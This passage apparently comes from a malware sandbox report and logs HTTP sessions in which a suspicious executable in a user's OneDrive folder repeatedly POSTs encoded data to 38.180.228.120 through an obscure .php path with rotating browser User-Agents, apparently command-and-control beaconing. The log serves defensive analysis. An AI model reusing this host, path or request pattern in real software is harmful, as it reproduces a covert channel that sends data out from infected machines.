                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 32 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.74997538.180.228.120803620C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:53:10.145323038 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:10.493841887 CET344OUTData Raw: 05 07 01 05 06 0a 04 00 05 06 02 01 02 04 01 07 00 0a 05 08 02 02 03 0a 07 02 0e 07 06 04 06 05 0a 01 06 0e 01 54 05 07 0f 02 02 00 07 00 02 06 04 06 0f 0a 0d 02 04 00 01 03 06 54 05 04 04 0c 01 02 0a 00 07 0e 04 54 0c 00 0f 01 0c 05 0e 04 07 50
                                                  Data Ascii: TTTPTWU\L~@hcjt[}v[cT~ob\tos^k]`Iy|Yxcz|~lC`YoZ}_~V@@{}\A~\y
                                                  Nov 19, 2024 18:53:10.785850048 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:10.913754940 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:10 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.74997638.180.228.120803616C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:53:22.609935999 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:22.958986998 CET344OUTData Raw: 00 01 04 01 06 09 01 02 05 06 02 01 02 02 01 06 00 04 05 08 02 04 03 09 03 56 0c 04 04 00 06 06 0c 02 06 5e 02 0c 03 0a 0d 0b 04 03 04 0a 07 56 06 06 0e 0b 0f 00 04 06 06 55 03 07 07 01 07 01 01 0b 0f 0e 06 01 01 02 0d 03 0c 04 0a 03 0d 07 05 03
                                                  Data Ascii: V^VU\\P\L}P~czt\[bfP|uMwUk_hctDy|[o^b|Shwk\}_~V@{mTA}ru
                                                  Nov 19, 2024 18:53:23.262121916 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 33 3a 32 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:53:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.74997738.180.228.120805352C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:53:32.769346952 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:33.115202904 CET344OUTData Raw: 00 0a 01 06 06 0a 01 05 05 06 02 01 02 07 01 04 00 02 05 09 02 07 03 0b 07 00 0f 01 03 02 00 08 0f 0f 06 0b 03 07 03 0a 0d 00 05 00 00 02 06 05 07 04 0c 5e 0e 00 04 07 06 04 04 56 06 06 07 0b 02 07 0d 0b 00 04 06 01 0c 50 0b 03 0c 0d 0e 07 05 57
                                                  Data Ascii: ^VPW[W\L}PNzNvriLv`~o~YwB^Mt{olX{`bImltd|u~V@A{CrN}L}
                                                  Nov 19, 2024 18:53:33.436414957 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:33.563729048 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:33 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.74997838.180.228.120807648C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:53:45.298579931 CET450OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:45.646473885 CET344OUTData Raw: 00 04 04 03 06 09 04 05 05 06 02 01 02 02 01 02 00 06 05 0c 02 01 03 0a 01 00 0c 05 05 02 03 08 0f 52 04 01 03 06 04 57 0c 07 05 0a 00 04 05 52 07 03 0d 0e 0f 01 05 0a 05 07 05 06 04 52 07 0c 01 07 0e 01 05 56 01 05 0d 01 0e 05 0d 51 0e 04 05 57
                                                  Data Ascii: RWRRVQWR\L}U|`~tqaMuKPkUvXwB`hMtloxZo^zTttt|~O~V@xmb~by
                                                  Nov 19, 2024 18:53:46.097109079 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 33 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:53:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.74997938.180.228.120806484C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:53:58.539840937 CET467OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                  Host: 38.180.228.120
                                                  Content-Length: 336
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:53:58.899311066 CET336OUTData Raw: 00 01 01 00 03 0d 01 07 05 06 02 01 02 05 01 0a 00 04 05 0d 02 06 03 01 00 00 0f 01 07 07 00 02 0d 55 06 00 01 0c 07 01 0b 00 07 07 00 07 05 02 07 02 0c 5e 0c 57 04 57 06 55 04 50 04 00 00 0e 03 06 0f 5e 07 00 07 02 0f 05 0c 54 0f 00 0f 06 06 03
                                                  Data Ascii: U^WWUP^TWRU\L~|NXNtLyu[xRrXtBxL|p`y|UJop}ZkSsSvg|Oi_~V@{CbOey
                                                  Nov 19, 2024 18:53:59.181468964 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:53:59.315306902 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:53:59 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9192.168.2.74998038.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:54:08.745819092 CET414OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:09.099478960 CET344OUTData Raw: 05 02 04 04 03 08 01 05 05 06 02 01 02 0c 01 06 00 04 05 09 02 03 03 0f 00 55 0f 00 06 54 01 50 0c 06 06 0a 07 0d 07 52 0b 05 05 04 07 54 07 06 03 05 0e 0d 0a 04 05 0b 04 50 07 03 06 56 05 5b 01 00 0d 59 05 00 06 01 0c 52 0d 06 0f 03 0d 00 05 04
                                                  Data Ascii: UTPRTPV[YRUV\L~cbt[muucTkRyLwt|s^{UgKlbkCRcwpiO~V@{mTN~LS
                                                  Nov 19, 2024 18:54:09.389152050 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 30 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:09 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10192.168.2.74998138.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:54:20.179734945 CET402OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:20.536990881 CET344OUTData Raw: 05 01 01 00 03 0c 04 00 05 06 02 01 02 04 01 0a 00 03 05 0d 02 07 03 0a 03 56 0e 01 06 52 01 08 0d 55 04 09 01 06 04 0a 0b 0a 05 01 07 51 02 07 04 04 0b 0a 0a 00 04 55 01 06 03 02 04 04 06 00 03 03 0d 0c 00 03 06 53 0b 02 0d 03 0f 04 0f 03 05 01
                                                  Data Ascii: VRUQUSZUWS\L~h^fwqiLbflOkUuMtBcX]o_{BcHx^r}}t@cgt~_~V@@zmv}Ly
                                                  Nov 19, 2024 18:54:20.817892075 CET518INHTTP/1.1 100 Continue
                                                  Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 34 3a 32 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c [TRUNCATED]
                                                  Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:54:20 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  11192.168.2.74998238.180.228.12080
                                                  TimestampBytes transferredDirectionData
                                                  Nov 19, 2024 18:54:29.562922001 CET402OUTPOST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1
                                                  Content-Type: application/octet-stream
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                  Host: 38.180.228.120
                                                  Content-Length: 344
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Nov 19, 2024 18:54:29.912136078 CET344OUTData Raw: 05 07 04 01 06 09 01 01 05 06 02 01 02 04 01 03 00 03 05 08 02 06 03 0d 07 01 0e 02 03 03 06 01 0d 53 04 59 03 04 05 52 0d 02 06 0a 00 0b 02 01 06 53 0c 0d 0f 57 06 52 01 0f 04 57 07 04 06 00 00 57 0d 0c 04 07 07 08 0d 02 0f 07 0d 04 0f 03 07 03
                                                  Data Ascii: SYRSWRWWP\L~k`vtLuv[|A|Bf]vowY|MoXoBx_xsfhS]RtYk_ie~V@@x}vA}\e
                                                  Nov 19, 2024 18:54:30.216788054 CET25INHTTP/1.1 100 Continue
                                                  Nov 19, 2024 18:54:30.349965096 CET493INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Nov 2024 17:54:30 GMT
                                                  Server: Apache/2.4.41 (Ubuntu)
                                                  Content-Length: 276
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
